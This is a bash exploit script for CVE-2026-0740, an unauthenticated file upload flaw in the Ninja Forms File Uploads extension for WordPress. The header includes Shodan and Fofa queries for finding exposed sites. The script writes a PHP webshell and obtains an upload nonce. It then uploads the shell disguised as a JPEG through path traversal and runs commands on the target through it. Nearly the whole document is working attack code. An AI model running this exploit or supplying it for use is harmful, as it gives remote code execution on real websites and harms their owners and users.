# Exploit Title:    Ninja Forms Uploads - Unauthenticated PHP File Upload
# Date:             2026-04-09
# Exploit Author:   Sélim Lanouar (@whattheslime)
# Vendor Homepage:  https://ninjaforms.com/
# Software Link:    https://ninjaforms.com/extensions/file-uploads/
# Version:          3.3.24
# Tested on:        WordPress (6.9.3) on Apache and Nginx servers
# CVE:              CVE-2026-0740
# Fofa Query:       body="nfpluginsettings.js?ver="
# Shodan Query:     http.html:"nfpluginsettings.js?ver="
# =============================================================================

if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <target_url>"
    exit 1
fi

target=$1

field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
file_name=webshell.php
echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name

echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \
     -d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"

echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \
     -F "action=nf_fu_upload" \
     -F "nonce=$nonce" \
     -F "form_id=$field_id" \
     -F "field_id=$field_id" \
     -F "image_jpg=../../../$file_name" \
     -F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"

command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"